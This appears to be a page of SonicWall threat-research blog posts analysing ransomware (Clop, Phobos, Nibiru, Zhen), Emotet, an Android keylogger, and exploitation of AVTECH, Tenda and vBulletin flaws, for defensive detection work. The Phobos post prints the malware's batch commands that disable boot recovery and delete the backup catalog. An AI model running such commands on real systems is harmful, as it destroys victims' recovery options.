Posts

A new variant of Clop Ransomware surfaces

/in /by

The SonicWall Capture Labs threat research team observed reports of a new variant family of Clop ransomware (Detected as Clop.RSM) actively spreading in the wild.

The Clop ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle

The ransomware adds the following files to the system:

  • Malware.exe
  • %CurrentFolder%\HotGIrls (ZeroKb)
  • %CurrentFolder%\Clearnetworkdns_11-22-33.bat

In order to deceive the emulator and avoid execution of the real malicious code in the time bound sandboxes, it calls APIs from Kernel32.dll with invalid parameters. The loop is repeated 666000 times.

After the completion of the loop it starts enumerating running process.

Malware checks the presence of below processes belonging to security vendors:

  • SBAMSvc.exe (GFI AntiMalware antivirus product)
  • VipreAAPSvc.exe (Vipre antivirus product)
  • SBAMTray.exe (Vipre antivirus product)
  • SBPIMSvc.exe (Sunbelt AntiMalware antivirus product)
  • WRSA.exe (WebRoot antivirus product)

If it finds the presence any of these processes it delay the execution by 10 seconds by calling Sleep() api twice with 5 seconds as a parameter.

It creates a Mutex “^_-HappyLife^_-” and checks if its was previously created by calling “WaitForSingleObject” and checking the result with 0. If the result is non zero it means that another instance is running, in that case it exits.

After that it follows the normal execution path (the execution path in which there was no presence of above mentioned security vendor processes)

It drops a batch file in the current folder from where the malware sample is executed and executes the batch file using ShellExecute API.

It then creates two threads, one of the thread uses MPR.DLL for enumerating network resources and encrypting files found on the network drives and other thread is used for enumerating running process:

It searches directory and sub directory using FindFirstFile and FindNextFile APIs, after which a unique hash is calculated using path of the FileName / FolderName which are then compared with hardcoded hash values. If the hash matches the Folder or the File are not encrypted:

In the second thread it starts enumerating the processes, the name of the process are then converted into the upper case:

And using the same logic which was used to calculate the hash value for the FileName /FolderName a unique hash value is calculated.
The hash value is then compared with hardcoded hash values and the process for which the hash is matched is terminated.

It encrypts each bytes of the file with the randomly generated AES key, after encryption at the end of the file it adds the mark “Clop^_”. After the mark it puts the key used to crypt the file ciphered with the master RSA key that has hardcoded the malware.

The .Clop extension is appended to the encrypted files.

And in each folder it drops the ClopReadMe.txt containing ransom note.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Clop.RSM (Trojan)

Attackers actively targeting vulnerable AVTECH devices

/in /by

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in AVTECH devices. AVTECH’s primary products are DVR and mobile surveillance systems. It’s products target the IP camera market and are commonly used in intelligence surveillance systems.
Attackers are targeting following two vulnerabilities in AVTECH’s products :

1.Unauthenticated command injection in DVR devices

The cgi_query action in Search.cgi performs HTML requests with the wget system command, which uses the received parameters without sanitization or verification. By exploiting this issue, an attacker can execute any system command with root privileges without authentication.

Following are the list of exploits spotted in the wild

2. Authenticated command injection in CloudSetup.cgi

Devices that support the Avtech cloud contain CloudSetup.cgi, which can be accessed after authentication. The exefile parameter of a CloudSetup.cgi request specifies the system command to be executed.Since there is no verification or white list-based checking of the exefile parameter, an attacker can execute arbitrary system commands with root privileges.

Following are the list of exploits spotted in the wild for this vulnerability

Decoding the URLs and taking a closer look at them .

Both exploits connect to malicious domain and download a shell script. The exploit changes the file permissions and executes the shell script. This in turn is again used to connect to the attacker controlled server to download more malicious files.

SonicWall Capture Labs provides protection against this threat via following signatures:

  • IPS 14697:AVTECH Devices Command Injection
  • IPS 13035:AVTECH Devices Remote Command Execution
  • GAV:Mirai.H
  • GAV:Mirai.H_2
  • GAV:MiraiA.N
  • GAV:MiraiA.N_2

Threat Graph

IoCs:
185.172.110.205
185.172.110.241
185.172.111.196
185.172.111.202
45.95.168.98
dcdeae98d9ab0fa3005ec36b1f55bb5b
99d3ce410735ba5e7008198aae3a6e39
4dcfa2daeb85d89da784e5e1928062de
148a1941582372ce22eacf86b5c7f852

 

Nibiru ransomware actively spreading in the wild

/in /by

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of NIBIRU ransomware [NIBIRU.RSM] actively spreading in the wild.

The NIBIRU ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <NIBIRU >

Once the computer is compromised, the ransomware runs the following commands: (Actual Source code)

When NIBIRU is started it will create and assign a unique ID number to the victim then scan all local drives for data files to encrypt.

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [NIBIRU] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: NIBIRU.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

A potent keylogger on Github

/in /by

SonicWall Threats Research team came across an interesting Tweet that mentions about a repository on Github. This repository is named as Hakistan and it boasts of hacking related tools. One tool among the list of tools is a keylogger named Hakistan keylogger which does not appear to be created for malicious purposes.

 

Application details

 

Interestingly, the application name for this app is Google Service and it has a relevant icon as well. Clearly this keylogger application is trying to masquerade as a legitimate application thereby violating Google Play policies.

Install_image

Some of the services and receivers in this app request for dangerous permissions like:

  • BIND_NOTIFICATION_LISTENER_SERVICE
  • BIND_DEVICE_ADMIN
  • BIND_ACCESSIBILITY_SERVICE

Keylogging

Once execution begins, as expected the application requests the victim to grant several permissions and access:

One the required permissions are granted the keylogger keeps running in the background and monitors the victim’s keystrokes. The keystrokes are stored in a file locally as shown:

 

Additional Features

This keylogger logs more than just keystrokes. Some additional data stolen by this keylogger is as shown below:

Captures SMS on the device

 

Monitors incoming SMS

 

Forward SMS present on the device

 

Captures system information

 

Clients receive data about vicitims via email messages where the ‘from’ is keylogger@hakistan.org:

 

In case of the current sample the to address is base64 encoded, which decodes to dashdashpass7@gmail.com

 

These findings go in line with what is advertised about this keylogger:

 

Research related tools on Github are dime-a-dozen, if they are being used for research purpose most of them have a disclaimer that states their purpose. In this case the fact that the application is being saved as Google Services with believable icon makes it look a bit suspicious.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AndroidOSHakis.KLG (Trojan)

Microsoft Security Bulletin Coverage for October 2020

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2020. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2020-16896 Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
IPS 15203:Windows Remote Desktop Protocol Information Disclosure (CVE-2020-16896)

CVE-2020-16898 Windows TCP/IP Remote Code Execution Vulnerability
IPS 2416:Windows TCP/IP Remote Code Execution (CVE-2020-16898)

CVE-2020-16899 Windows TCP/IP Denial of Service Vulnerability
IPS 2427:Windows TCP/IP DoS (CVE-2020-16899)

CVE-2020-16907 Win32k Elevation of Privilege Vulnerability
ASPY 108:Malformed-File exe.MP.158

CVE-2020-16913 Win32k Elevation of Privilege Vulnerability
ASPY 5998:Malformed-File exe.MP.159

CVE-2020-16915 Media Foundation Memory Corruption Vulnerability
IPS 15202:Windows Media Foundation Memory Corruption Vulnerability (CVE-2020-16915)

CVE-2020-16922 Windows Spoofing Vulnerability
ASPY 5999:Malformed-File cat.MP.1

Following vulnerabilities do not have exploits in the wild :
CVE-2020-0764 Windows Storage Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1047 Windows Hyper-V Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1080 Windows Hyper-V Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1167 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1243 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-16863 Windows Remote Desktop Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-16876 Windows Application Compatibility Client Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16877 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16885 Windows Storage VSP Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16886 PowerShellGet Module WDAC Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-16887 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16889 Windows KernelStream Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16890 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16891 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16892 Windows Image Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16894 Windows NAT Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16895 Windows Error Reporting Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16897 NetBT Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16900 Windows Event System Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16901 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16902 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16904 Azure Functions Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16905 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16908 Windows Setup Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16909 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16910 Windows Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-16911 GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16912 Windows Backup Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16914 Windows GDI+ Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16916 Windows COM Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16918 Base3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16919 Windows Enterprise App Management Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16920 Windows Application Compatibility Client Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16921 Windows Text Services Framework Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16923 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16924 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16927 Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-16928 Microsoft Office Click-to-Run Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16929 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16930 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16931 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16932 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16933 Microsoft Word Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-16934 Microsoft Office Click-to-Run Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16935 Windows COM Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16936 Windows Backup Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16937 .NET Framework Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16938 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16939 Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16940 Windows – User Profile Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16941 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16942 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16943 Dynamics 365 Commerce Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16944 Microsoft SharePoint Reflective XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-16945 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-16946 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-16947 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16948 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16949 Microsoft Outlook Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-16950 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16951 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16952 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16953 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16954 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16955 Microsoft Office Click-to-Run Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16956 Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-16957 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16967 Windows Camera Codec Pack Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16968 Windows Camera Codec Pack Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16969 Microsoft Exchange Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16972 Windows Backup Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16973 Windows Backup Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16974 Windows Backup Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16975 Windows Backup Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16976 Windows Backup Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16977 Visual Studio Code Python Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16978 Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-16980 Windows iSCSI Target Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16995 Network Watcher Agent Virtual Machine Extension for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17003 Base3D Remote Code Execution Vulnerability
There are no known exploits in the wild.

Modular Emotet Variant

/in /by

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Emotet. Emotet is an advanced, self-propagating modular malware. Historically, Emotet was a advanced banking malware with botnet capabilities and indicators. Emotet has a variety of install sequences for many different content delivery mechanisms. Mostly Emotet is spread through phishing spam emails containing attachments. The command and control, payloads, and delivery solutions change over time. Emotet first emerged in June of 2014.

Sample, Static Information:

Checking for valid values within the PE File:

Command-line Static Information:

Capabilities, Privilege Escalation and Keylogging stand out here:

Dynamic Information:

WinMain:

Processes Created, Svchost, Calc, MSpaint, and itself twice:

Pipes are used to transfer data:

Network Artifacts:

Injection into mspaint.exe, IP Address: 212.83.168.196

IP Information:

Graph:

Other EXEs that align with this sample:

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: Emotet.N (Trojan)

Appendix:

Sample SHA256 Hash: 5c5267ba9105ed1ebd26d50db8886030a601ffcda46fdbedf85b9a0bdc46e431

Attackers actively targeting Tenda WiFi router vulnerability

/in /by
SonicWall Capture Labs Threat Research team observes attackers actively exploiting the  arbitrary remote code execution vulnerability reported in Tenda AC15 router. Tenda AC15 AC1900AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart home networking life.

CVE-2020–10987 | Vulnerability:

The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName parameter. This vulnerability is due to improper validation of the input parameter deviceName and this value is directly passed to a doSystemCmd function, causing an arbitrary command execution.

Exploit:

In the below exploit request that was captured, the attacker passes the malicious shellcode through the deviceName parameter, allowing arbitrary code execution.

This command downloads a reverse shell to the temp directory and executes it

When usb.sh is executed, it downloads more payloads from the attacker server 5.252.194.29 and executes them one by one.

Trend Chart:

IOC:

185.39.11.105
5.252.194.29

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13634 Suspicious Request URI 17
IPS: 5811 Web Application Suspicious File Upload 1 -c2
IPS: 3141 Web Application Suspicious File Upload 11
IPS: 15028 Web Application Suspicious File Upload 18

 

Operator of new Phobos variant gives blunt response during negotiation

/in /by

The SonicWall Capture Labs threat research team have observed a new variant from the Phobos ransomware family.  Like Sodinokibi, Phobos is sold on the criminal underground using the ransomware-as-a-service (RaaS) model.  It is spread using various infection methods such as vulnerable Remote Desktop connections and spam email attachments. In the past we have seen Phobos primarily targeting businesses.  However, recently we have also seen several reports of individuals being hit with this malware.  During our analysis of this malware we negotiate ransom payment with the operator.

 

Infection cycle:

 

Upon infection, the following files are dropped onto the system:

  • %APPDATA%\roaming\microsoft\windows\start menu\programs\startup\db_exec.exe [Detected as: GAV: Phobos.RSM_12 (Trojan)]
  • {malware run location}\TempWmicBatchFile.bat
  • {desktop}\info.hta
  • {desktop}\info.txt

 

Files on the system are encrypted and given the following extension:

  • id[94458690-2589].[helpisos@aol.com].isos

 

TempWmicBatchFile.bat contains the following script which, when executed, disables system recovery features:

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
exit

 

info.hta contains the ransom message and is displayed multiple times on the desktop:

 

info.txt also contains the ransom message:

 

Negotiation:

 

We attempted to reach out to helpisos@aol.com as instructed in the ransom note but were notified by the email server that the address “couldn’t be found, or is unable to receive mail“.  We proceeded to contact @iso_recovery on Telegram and had the following conversation with the operator:

 

Nowadays, ransom fees for individuals are negotiable.  We tried our luck to see how much of a discount is available:

 

We attempted to push further and enlighten the operator about our “dire financial situation” but received the following blunt response:

 

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Phobos.RSM_12 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

CVE-2020-17496 – vBulletin RCE vulnerability actively being exploited in the wild

/in /by
SonicWall Capture Labs Threat Research team observes attackers actively exploiting the recent remote code execution vulnerability reported in vBulletin. VBulletin is a popular forum software used by about 20,000 websites. It is written in PHP and uses the MySQL database. 

CVE-2020-17496 | Vulnerability:

A remote code execution vulnerability has been reported in vBulletin. This vulnerability is due to improper validation of subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. It is a bypass for CVE-2019-16759, a critical pre-authentication vulnerability in vBulletin that was disclosed in September 2019. When an attacker sends a crafted ajax request that contains the template name widget_php with malicious code placed in the parameter widgetConfig[‘code’], the render engine will execute the malicious code in the request. It was fixed by checking the name, If the name is widget_php, the engine won’t render the requested template. That made widget_php the only template that could be utilized for PHP code execution. In the latest bypass, the tabbedcontainer_tab_panel template widget is found to be capable of loading “a user-controlled child template, effectively bypassing the patch for CVE-2019-16759.

Exploit:

In the below post request, the child template name is widget_php and the malicious code can be passed through subWidget elements allowing remote code execution.

 

 

A remote, unauthenticated attacker could exploit this vulnerability by sending the above crafted request to the vulnerable server. Successful exploitation could result in remote code execution.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15163 vBulletin widget_tabbedContainer_tab_panel Remote Command Execution

Affected Products:

All versions of vBulletin prior to the 5.6.x are affected by this vulnerability. Users should migrate over to a patched version as soon as possible.

Zhen ransomware actively spreading in the wild

/in /by

The SonicWall Capture Labs threat research team observed reports of a new variant family of Zhen ransomware [Zhen.RSM] actively spreading in the wild.

The Zhen ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. < . Zhen >
    • %App.path%\ payment request.txt > recovery instruction

Once the computer is compromised, the ransomware runs the following commands:  (Actual Source code)

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [Zhen] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: ZHEN.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.